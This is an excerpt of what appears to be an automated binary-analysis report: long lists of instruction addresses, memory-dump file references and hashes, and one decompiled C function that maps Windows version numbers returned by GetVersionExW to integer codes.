                                                                                                                                                                      0x0040f910
                                                                                                                                                                      0x0040f913
                                                                                                                                                                      0x0040f919
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f8c6
                                                                                                                                                                      0x0040f8c6
                                                                                                                                                                      0x0040f8c8
                                                                                                                                                                      0x0040f8f5
                                                                                                                                                                      0x0040f8f5
                                                                                                                                                                      0x0040f8fa
                                                                                                                                                                      0x0040f8fe
                                                                                                                                                                      0x0040f8ff
                                                                                                                                                                      0x0040f901
                                                                                                                                                                      0x0040f903
                                                                                                                                                                      0x0040f906
                                                                                                                                                                      0x0040f906
                                                                                                                                                                      0x0040f906
                                                                                                                                                                      0x0040f90c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f8d0
                                                                                                                                                                      0x0040f8d0
                                                                                                                                                                      0x0040f8d0
                                                                                                                                                                      0x0040f8d2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f8d8
                                                                                                                                                                      0x0040f8db
                                                                                                                                                                      0x0040f8dd
                                                                                                                                                                      0x0040f8df
                                                                                                                                                                      0x0040f8e0
                                                                                                                                                                      0x0040f8e3
                                                                                                                                                                      0x0040f8e5
                                                                                                                                                                      0x0040f8e8
                                                                                                                                                                      0x0040f8ec
                                                                                                                                                                      0x0040f8ed
                                                                                                                                                                      0x0040f8f1
                                                                                                                                                                      0x0040f8f3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f8f3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f8d0
                                                                                                                                                                      0x0040f8c8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f91f
                                                                                                                                                                      0x0040f91f
                                                                                                                                                                      0x0040f922
                                                                                                                                                                      0x0040f925
                                                                                                                                                                      0x0040f92e
                                                                                                                                                                      0x0040f930
                                                                                                                                                                      0x0040f934
                                                                                                                                                                      0x0040f936
                                                                                                                                                                      0x0040f93b
                                                                                                                                                                      0x0040f93e
                                                                                                                                                                      0x0040f941
                                                                                                                                                                      0x0040f943
                                                                                                                                                                      0x0040f988
                                                                                                                                                                      0x0040f988
                                                                                                                                                                      0x0040f98a
                                                                                                                                                                      0x0040fa44
                                                                                                                                                                      0x0040fa44
                                                                                                                                                                      0x0040fa4a
                                                                                                                                                                      0x0040fa4d
                                                                                                                                                                      0x0040fa50
                                                                                                                                                                      0x0040fa56
                                                                                                                                                                      0x0040fa58
                                                                                                                                                                      0x0040fa5a
                                                                                                                                                                      0x0040fa5e
                                                                                                                                                                      0x0040fa60
                                                                                                                                                                      0x0040fa78
                                                                                                                                                                      0x0040fa7a
                                                                                                                                                                      0x0040fa80
                                                                                                                                                                      0x0040fa83
                                                                                                                                                                      0x0040fa86
                                                                                                                                                                      0x0040fa86
                                                                                                                                                                      0x0040fa89
                                                                                                                                                                      0x0040fa8c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fa62
                                                                                                                                                                      0x0040fa62
                                                                                                                                                                      0x0040fa66
                                                                                                                                                                      0x0040fa6d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fa6d
                                                                                                                                                                      0x0040f990
                                                                                                                                                                      0x0040f990
                                                                                                                                                                      0x0040f992
                                                                                                                                                                      0x0040f997
                                                                                                                                                                      0x0040f99a
                                                                                                                                                                      0x0040f99c
                                                                                                                                                                      0x0040f99f
                                                                                                                                                                      0x0040f9a6
                                                                                                                                                                      0x0040f9a8
                                                                                                                                                                      0x0040f9ab
                                                                                                                                                                      0x0040f9ad
                                                                                                                                                                      0x0040f9af
                                                                                                                                                                      0x0040f9b0
                                                                                                                                                                      0x0040f9b8
                                                                                                                                                                      0x0040f9ba
                                                                                                                                                                      0x0040f9be
                                                                                                                                                                      0x0040f9c0
                                                                                                                                                                      0x0040f9c5
                                                                                                                                                                      0x0040f9c8
                                                                                                                                                                      0x0040f9cf
                                                                                                                                                                      0x0040f9d2
                                                                                                                                                                      0x0040f9d4
                                                                                                                                                                      0x0040f9d6
                                                                                                                                                                      0x0040fa2f
                                                                                                                                                                      0x0040fa2f
                                                                                                                                                                      0x0040fa33
                                                                                                                                                                      0x0040fa36
                                                                                                                                                                      0x0040fa3a
                                                                                                                                                                      0x0040fa3c
                                                                                                                                                                      0x0040fa3e
                                                                                                                                                                      0x0040fa3e
                                                                                                                                                                      0x0040fa3e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f9d8
                                                                                                                                                                      0x0040f9d8
                                                                                                                                                                      0x0040f9d8
                                                                                                                                                                      0x0040f9da
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f9e0
                                                                                                                                                                      0x0040f9e4
                                                                                                                                                                      0x0040f9e6
                                                                                                                                                                      0x0040f9eb
                                                                                                                                                                      0x0040f9ee
                                                                                                                                                                      0x0040f9ef
                                                                                                                                                                      0x0040f9f2
                                                                                                                                                                      0x0040f9f5
                                                                                                                                                                      0x0040f9f9
                                                                                                                                                                      0x0040f9fe
                                                                                                                                                                      0x0040fa02
                                                                                                                                                                      0x0040fa08
                                                                                                                                                                      0x0040fa0a
                                                                                                                                                                      0x0040fa0c
                                                                                                                                                                      0x0040fa0f
                                                                                                                                                                      0x0040fa15
                                                                                                                                                                      0x0040fa1b
                                                                                                                                                                      0x0040fa1e
                                                                                                                                                                      0x0040fa23
                                                                                                                                                                      0x0040fa29
                                                                                                                                                                      0x0040fa2b
                                                                                                                                                                      0x0040fa2d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fa2d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f9d8
                                                                                                                                                                      0x0040f9d6
                                                                                                                                                                      0x0040f945
                                                                                                                                                                      0x0040f945
                                                                                                                                                                      0x0040f945
                                                                                                                                                                      0x0040f947
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f94d
                                                                                                                                                                      0x0040f950
                                                                                                                                                                      0x0040f952
                                                                                                                                                                      0x0040f954
                                                                                                                                                                      0x0040f955
                                                                                                                                                                      0x0040f958
                                                                                                                                                                      0x0040f95a
                                                                                                                                                                      0x0040f95d
                                                                                                                                                                      0x0040f960
                                                                                                                                                                      0x0040f964
                                                                                                                                                                      0x0040f965
                                                                                                                                                                      0x0040f96a
                                                                                                                                                                      0x0040f970
                                                                                                                                                                      0x0040f971
                                                                                                                                                                      0x0040f975
                                                                                                                                                                      0x0040f978
                                                                                                                                                                      0x0040f97a
                                                                                                                                                                      0x0040f981
                                                                                                                                                                      0x0040f984
                                                                                                                                                                      0x0040f986
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f986
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f945
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fa8f
                                                                                                                                                                      0x0040fa8f
                                                                                                                                                                      0x0040fa92
                                                                                                                                                                      0x0040fa94
                                                                                                                                                                      0x0040fae0
                                                                                                                                                                      0x0040fae0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fa96
                                                                                                                                                                      0x0040fa96
                                                                                                                                                                      0x0040fa98
                                                                                                                                                                      0x0040fac5
                                                                                                                                                                      0x0040fac5
                                                                                                                                                                      0x0040faca
                                                                                                                                                                      0x0040face
                                                                                                                                                                      0x0040facf
                                                                                                                                                                      0x0040fad1
                                                                                                                                                                      0x0040fad3
                                                                                                                                                                      0x0040fad6
                                                                                                                                                                      0x0040fad6
                                                                                                                                                                      0x0040fad6
                                                                                                                                                                      0x0040fadc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040faa0
                                                                                                                                                                      0x0040faa0
                                                                                                                                                                      0x0040faa0
                                                                                                                                                                      0x0040faa2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040faa8
                                                                                                                                                                      0x0040faab
                                                                                                                                                                      0x0040faad
                                                                                                                                                                      0x0040faaf
                                                                                                                                                                      0x0040fab0
                                                                                                                                                                      0x0040fab3
                                                                                                                                                                      0x0040fab5
                                                                                                                                                                      0x0040fab8
                                                                                                                                                                      0x0040fabc
                                                                                                                                                                      0x0040fabd
                                                                                                                                                                      0x0040fac1
                                                                                                                                                                      0x0040fac3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fac3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040faa0
                                                                                                                                                                      0x0040fa98
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fae6
                                                                                                                                                                      0x0040fae6
                                                                                                                                                                      0x0040faea
                                                                                                                                                                      0x0040faec
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040faf2
                                                                                                                                                                      0x0040faf2
                                                                                                                                                                      0x0040faf6
                                                                                                                                                                      0x0040faf8
                                                                                                                                                                      0x0040fafb
                                                                                                                                                                      0x0040fafd
                                                                                                                                                                      0x0040fb4d
                                                                                                                                                                      0x0040fb51
                                                                                                                                                                      0x0040fb51
                                                                                                                                                                      0x0040fb53
                                                                                                                                                                      0x0040fb57
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040faff
                                                                                                                                                                      0x0040faff
                                                                                                                                                                      0x0040fb01
                                                                                                                                                                      0x0040fb04
                                                                                                                                                                      0x0040fb25
                                                                                                                                                                      0x0040fb25
                                                                                                                                                                      0x0040fb28
                                                                                                                                                                      0x0040fb2a
                                                                                                                                                                      0x0040fb3b
                                                                                                                                                                      0x0040fb3d
                                                                                                                                                                      0x0040fb3d
                                                                                                                                                                      0x0040fb2c
                                                                                                                                                                      0x0040fb2c
                                                                                                                                                                      0x0040fb31
                                                                                                                                                                      0x0040fb34
                                                                                                                                                                      0x0040fb34
                                                                                                                                                                      0x0040fb40
                                                                                                                                                                      0x0040fb44
                                                                                                                                                                      0x0040fb47
                                                                                                                                                                      0x0040fb49
                                                                                                                                                                      0x0040fb5a
                                                                                                                                                                      0x0040fb5a
                                                                                                                                                                      0x0040fb5a
                                                                                                                                                                      0x0040fb5c
                                                                                                                                                                      0x0040fb60
                                                                                                                                                                      0x0040fb62
                                                                                                                                                                      0x0040fb62
                                                                                                                                                                      0x0040fb66
                                                                                                                                                                      0x0040fb6a
                                                                                                                                                                      0x0040fb6c
                                                                                                                                                                      0x0040fb70
                                                                                                                                                                      0x0040fb73
                                                                                                                                                                      0x0040fb77
                                                                                                                                                                      0x0040fb77
                                                                                                                                                                      0x0040fb80
                                                                                                                                                                      0x0040fb80
                                                                                                                                                                      0x0040fb83
                                                                                                                                                                      0x0040fb85
                                                                                                                                                                      0x0040fb86
                                                                                                                                                                      0x0040fb86
                                                                                                                                                                      0x0040fb86
                                                                                                                                                                      0x0040fb89
                                                                                                                                                                      0x0040fb8d
                                                                                                                                                                      0x0040fb91
                                                                                                                                                                      0x0040fb95
                                                                                                                                                                      0x0040fb98
                                                                                                                                                                      0x0040fb9e
                                                                                                                                                                      0x0040fb9e
                                                                                                                                                                      0x0040f1a6
                                                                                                                                                                      0x0040f1a6
                                                                                                                                                                      0x0040fb06
                                                                                                                                                                      0x0040fb06
                                                                                                                                                                      0x0040fb0d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fb0f
                                                                                                                                                                      0x0040fb0f
                                                                                                                                                                      0x0040fb13
                                                                                                                                                                      0x0040fb1a
                                                                                                                                                                      0x0040fb1a
                                                                                                                                                                      0x0040fb0d
                                                                                                                                                                      0x0040fb04
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fafd
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fba9
                                                                                                                                                                      0x0040fbae
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fbb4
                                                                                                                                                                      0x0040fbb4
                                                                                                                                                                      0x0040fbb8
                                                                                                                                                                      0x0040fbbb
                                                                                                                                                                      0x0040fbbf
                                                                                                                                                                      0x0040fbc3
                                                                                                                                                                      0x0040fbc5
                                                                                                                                                                      0x0040fbc9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fbc9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fbd4
                                                                                                                                                                      0x0040fbd8
                                                                                                                                                                      0x0040fbd9
                                                                                                                                                                      0x0040fbdb
                                                                                                                                                                      0x0040fbdd
                                                                                                                                                                      0x0040fbdd
                                                                                                                                                                      0x0040fbdd
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcac
                                                                                                                                                                      0x0040fcb0
                                                                                                                                                                      0x0040fd2c
                                                                                                                                                                      0x0040fd2c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcb2
                                                                                                                                                                      0x0040fcb2
                                                                                                                                                                      0x0040fcb6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcb8
                                                                                                                                                                      0x0040fcb8
                                                                                                                                                                      0x0040fcbb
                                                                                                                                                                      0x0040fce3
                                                                                                                                                                      0x0040fce3
                                                                                                                                                                      0x0040fce6
                                                                                                                                                                      0x0040fd24
                                                                                                                                                                      0x0040fd26
                                                                                                                                                                      0x0040fd26
                                                                                                                                                                      0x0040fd28
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fce8
                                                                                                                                                                      0x0040fce8
                                                                                                                                                                      0x0040fcec
                                                                                                                                                                      0x0040fcf3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcf3
                                                                                                                                                                      0x0040fcc0
                                                                                                                                                                      0x0040fcc0
                                                                                                                                                                      0x0040fcc0
                                                                                                                                                                      0x0040fcc2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcc8
                                                                                                                                                                      0x0040fccb
                                                                                                                                                                      0x0040fccd
                                                                                                                                                                      0x0040fccf
                                                                                                                                                                      0x0040fcd0
                                                                                                                                                                      0x0040fcd2
                                                                                                                                                                      0x0040fcd6
                                                                                                                                                                      0x0040fcd9
                                                                                                                                                                      0x0040fcdd
                                                                                                                                                                      0x0040fcde
                                                                                                                                                                      0x0040fce1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fce1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fcc0
                                                                                                                                                                      0x0040fcbb
                                                                                                                                                                      0x0040fcb6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fd32
                                                                                                                                                                      0x0040fd32
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fd3f
                                                                                                                                                                      0x0040ed61
                                                                                                                                                                      0x0040ed61
                                                                                                                                                                      0x0040ed65
                                                                                                                                                                      0x0040ed65
                                                                                                                                                                      0x0040ed69
                                                                                                                                                                      0x0040ed69
                                                                                                                                                                      0x0040ed71
                                                                                                                                                                      0x0040ed75
                                                                                                                                                                      0x0040ed7c
                                                                                                                                                                      0x0040ed83
                                                                                                                                                                      0x0040ed86
                                                                                                                                                                      0x0040ed8a
                                                                                                                                                                      0x0040ed8c
                                                                                                                                                                      0x0040ed90
                                                                                                                                                                      0x0040ed93
                                                                                                                                                                      0x0040ed96
                                                                                                                                                                      0x0040edba
                                                                                                                                                                      0x0040edc4
                                                                                                                                                                      0x0040edc9
                                                                                                                                                                      0x0040edcc
                                                                                                                                                                      0x0040edce
                                                                                                                                                                      0x0040fd67
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edd4
                                                                                                                                                                      0x0040edd4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edd4
                                                                                                                                                                      0x0040ed98
                                                                                                                                                                      0x0040ed98
                                                                                                                                                                      0x0040ed9b
                                                                                                                                                                      0x0040fd6b
                                                                                                                                                                      0x0040fd6f
                                                                                                                                                                      0x0040fd72
                                                                                                                                                                      0x0040fd75
                                                                                                                                                                      0x0040fd78
                                                                                                                                                                      0x0040fd7b
                                                                                                                                                                      0x0040fd7e
                                                                                                                                                                      0x0040fd82
                                                                                                                                                                      0x0040fd86
                                                                                                                                                                      0x0040fdc4
                                                                                                                                                                      0x0040fdc4
                                                                                                                                                                      0x0040fd88
                                                                                                                                                                      0x0040fd88
                                                                                                                                                                      0x0040fd8a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fd8c
                                                                                                                                                                      0x0040fd8f
                                                                                                                                                                      0x0040fd92
                                                                                                                                                                      0x0040fd96
                                                                                                                                                                      0x0040fd97
                                                                                                                                                                      0x0040fd9a
                                                                                                                                                                      0x0040fdb0
                                                                                                                                                                      0x0040fdb5
                                                                                                                                                                      0x0040fdb9
                                                                                                                                                                      0x0040fdbc
                                                                                                                                                                      0x0040fdbf
                                                                                                                                                                      0x0040fd9c
                                                                                                                                                                      0x0040fd9c
                                                                                                                                                                      0x0040fda1
                                                                                                                                                                      0x0040fda5
                                                                                                                                                                      0x0040fda8
                                                                                                                                                                      0x0040fdab
                                                                                                                                                                      0x0040fdab
                                                                                                                                                                      0x0040fd9a
                                                                                                                                                                      0x0040fd8a
                                                                                                                                                                      0x0040fdc8
                                                                                                                                                                      0x0040fdca
                                                                                                                                                                      0x0040fdcd
                                                                                                                                                                      0x0040fdd8
                                                                                                                                                                      0x0040fdd8
                                                                                                                                                                      0x0040fdcf
                                                                                                                                                                      0x0040fdcf
                                                                                                                                                                      0x0040fdd2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fdd4
                                                                                                                                                                      0x0040fdd4
                                                                                                                                                                      0x0040fdd4
                                                                                                                                                                      0x0040fdd2
                                                                                                                                                                      0x0040fde2
                                                                                                                                                                      0x0040fdfc
                                                                                                                                                                      0x0040fe01
                                                                                                                                                                      0x0040fe04
                                                                                                                                                                      0x0040fe0a
                                                                                                                                                                      0x0040fe0a
                                                                                                                                                                      0x0040fe0f
                                                                                                                                                                      0x0040fe35
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fe06
                                                                                                                                                                      0x0040fe06
                                                                                                                                                                      0x0040fe08
                                                                                                                                                                      0x0040fe11
                                                                                                                                                                      0x0040fe11
                                                                                                                                                                      0x0040fe15
                                                                                                                                                                      0x0040fe17
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fe1d
                                                                                                                                                                      0x0040fe29
                                                                                                                                                                      0x0040fe29
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040fe08
                                                                                                                                                                      0x0040eda1
                                                                                                                                                                      0x0040eda1
                                                                                                                                                                      0x0040eda3
                                                                                                                                                                      0x0040eda6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edac
                                                                                                                                                                      0x0040edac
                                                                                                                                                                      0x0040edaf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edb1
                                                                                                                                                                      0x0040edb1
                                                                                                                                                                      0x0040edb4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edb4
                                                                                                                                                                      0x0040edaf
                                                                                                                                                                      0x0040eda6
                                                                                                                                                                      0x0040ed9b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040edda
                                                                                                                                                                      0x0040edda
                                                                                                                                                                      0x0040eddf
                                                                                                                                                                      0x0040ede6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040f1aa
                                                                                                                                                                      0x0040f1aa
                                                                                                                                                                      0x0040f1ac
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040e890
                                                                                                                                                                      0x0040e87a
                                                                                                                                                                      0x0040e819
                                                                                                                                                                      0x00000000

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: D0A
                                                                                                                                                                      • API String ID: 0-1448066043
                                                                                                                                                                      • Opcode ID: f57bfb8e2b38a961d0c52b080ba4d4fa78b77839d7f02fd2cf2f7378c8d107cc
                                                                                                                                                                      • Instruction ID: 3032e7bda0a6bb374980cfe40a7480182f82bc0fd44c0d8c6c0f9fc434d1da9a
                                                                                                                                                                      • Opcode Fuzzy Hash: f57bfb8e2b38a961d0c52b080ba4d4fa78b77839d7f02fd2cf2f7378c8d107cc
                                                                                                                                                                      • Instruction Fuzzy Hash: A3429C716043029FD718CF2AC48471ABBE1FF84304F144A7EE855AB791D379E9A6CB89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040559A, Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                      			E0040559A() {
				void* _v2;
				struct _OSVERSIONINFOW _v284;
				char _v286;
				intOrPtr _v560;
				intOrPtr _v564;
				char _v568;
				struct _OSVERSIONINFOW _v844;
				void* _t18;
				intOrPtr _t19;
				signed int _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				void* _t40;
				signed int _t56;
				void* _t63;

				_v844.dwOSVersionInfoSize = 0x114;
				_t40 = 0xc8;
				_t25 = 0;
				_t32 = 0;
				if(GetVersionExW( &_v844) == 0) {
					L39:
					return _t40;
				}
				_t18 = _v844.dwPlatformId - 1;
				if(_t18 == 0) {
					_t19 = _v844.dwMinorVersion;
					if(_t19 == 0) {
						_push(0xa);
						L38:
						_pop(_t40);
						goto L39;
					}
					if(_t19 == 0xa) {
						_push(0x1e);
						goto L38;
					}
					if(_t19 != 0x5a) {
						goto L39;
					}
					_push(0x28);
					goto L38;
				}
				if(_t18 != 1) {
					goto L39;
				}
				_t56 = 0;
				if(E00405553( &_v568) == 0) {
					_v284.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v284) == 0) {
						goto L9;
					} else {
						_t25 = _v844.dwMajorVersion;
						_t32 = _v844.dwMinorVersion;
						goto L7;
					}
				} else {
					_t25 = _v564;
					_t32 = _v560;
					_t63 = _v286 - 1;
					L7:
					if(_t63 == 0) {
						_t56 = 1;
					}
					L9:
					_t26 = _t25 - 3;
					if(_t26 == 0) {
						_push(5);
						goto L38;
					}
					_t27 = _t26 - 1;
					if(_t27 == 0) {
						_push(0x14);
						goto L38;
					}
					_t28 = _t27 - 1;
					if(_t28 == 0) {
						_t33 = _t32;
						if(_t33 == 0) {
							_push(0x32);
							goto L38;
						}
						_t34 = _t33 - 1;
						if(_t34 == 0) {
							_push(0x3c);
							goto L38;
						}
						if(_t34 == 1) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x41;
						}
						goto L39;
					}
					_t29 = _t28 - 1;
					if(_t29 == 0) {
						_t36 = _t32;
						if(_t36 == 0) {
							asm("sbb esi, esi");
							_t40 = ( ~_t56 & 0xfffffffb) + 0x4b;
						} else {
							_t37 = _t36 - 1;
							if(_t37 == 0) {
								asm("sbb esi, esi");
								_t40 = ( ~_t56 & 0xfffffffb) + 0x55;
							} else {
								_t38 = _t37 - 1;
								if(_t38 == 0) {
									asm("sbb esi, esi");
									_t40 = ( ~_t56 & 0xfffffffb) + 0x5f;
								} else {
									if(_t38 == 1) {
										asm("sbb esi, esi");
										_t40 = ( ~_t56 & 0xfffffffb) + 0x69;
									}
								}
							}
						}
						goto L39;
					}
					if(_t29 != 4 || _t32 != 0) {
						goto L39;
					} else {
						_push(0x6e);
						goto L38;
					}
				}
			}


























                                                                                                                                                                      0x004055a8
                                                                                                                                                                      0x004055b1
                                                                                                                                                                      0x004055b6
                                                                                                                                                                      0x004055b8
                                                                                                                                                                      0x004055c2
                                                                                                                                                                      0x004056f3
                                                                                                                                                                      0x004056fe
                                                                                                                                                                      0x004056fe
                                                                                                                                                                      0x004055cc
                                                                                                                                                                      0x004055cd
                                                                                                                                                                      0x004056d5
                                                                                                                                                                      0x004056db
                                                                                                                                                                      0x004056ef
                                                                                                                                                                      0x004056f1
                                                                                                                                                                      0x004056f1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056f1
                                                                                                                                                                      0x004056e0
                                                                                                                                                                      0x004056eb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056eb
                                                                                                                                                                      0x004056e5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056e7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056e7
                                                                                                                                                                      0x004055d4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004055e1
                                                                                                                                                                      0x004055ec
                                                                                                                                                                      0x0040560d
                                                                                                                                                                      0x00405621
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405623
                                                                                                                                                                      0x00405623
                                                                                                                                                                      0x00405627
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040562b
                                                                                                                                                                      0x004055ee
                                                                                                                                                                      0x004055ee
                                                                                                                                                                      0x004055f5
                                                                                                                                                                      0x004055fc
                                                                                                                                                                      0x00405633
                                                                                                                                                                      0x00405633
                                                                                                                                                                      0x00405637
                                                                                                                                                                      0x00405637
                                                                                                                                                                      0x00405638
                                                                                                                                                                      0x00405638
                                                                                                                                                                      0x0040563b
                                                                                                                                                                      0x004056d1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056d1
                                                                                                                                                                      0x00405641
                                                                                                                                                                      0x00405642
                                                                                                                                                                      0x004056cd
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056cd
                                                                                                                                                                      0x00405648
                                                                                                                                                                      0x00405649
                                                                                                                                                                      0x004056ac
                                                                                                                                                                      0x004056af
                                                                                                                                                                      0x004056c9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056c9
                                                                                                                                                                      0x004056b1
                                                                                                                                                                      0x004056b2
                                                                                                                                                                      0x004056c5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056c5
                                                                                                                                                                      0x004056b5
                                                                                                                                                                      0x004056bb
                                                                                                                                                                      0x004056c0
                                                                                                                                                                      0x004056c0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004056b5
                                                                                                                                                                      0x0040564b
                                                                                                                                                                      0x0040564c
                                                                                                                                                                      0x00405666
                                                                                                                                                                      0x00405669
                                                                                                                                                                      0x004056a2
                                                                                                                                                                      0x004056a7
                                                                                                                                                                      0x0040566b
                                                                                                                                                                      0x0040566b
                                                                                                                                                                      0x0040566c
                                                                                                                                                                      0x00405694
                                                                                                                                                                      0x00405699
                                                                                                                                                                      0x0040566e
                                                                                                                                                                      0x0040566e
                                                                                                                                                                      0x0040566f
                                                                                                                                                                      0x00405686
                                                                                                                                                                      0x0040568b
                                                                                                                                                                      0x00405671
                                                                                                                                                                      0x00405672
                                                                                                                                                                      0x00405678
                                                                                                                                                                      0x0040567d
                                                                                                                                                                      0x0040567d
                                                                                                                                                                      0x00405672
                                                                                                                                                                      0x0040566f
                                                                                                                                                                      0x0040566c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405669
                                                                                                                                                                      0x00405651
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040565f
                                                                                                                                                                      0x0040565f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040565f
                                                                                                                                                                      0x00405651

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 004055BA
                                                                                                                                                                        • Part of subcall function 00405553: memset.MSVCRT ref: 00405562
                                                                                                                                                                        • Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
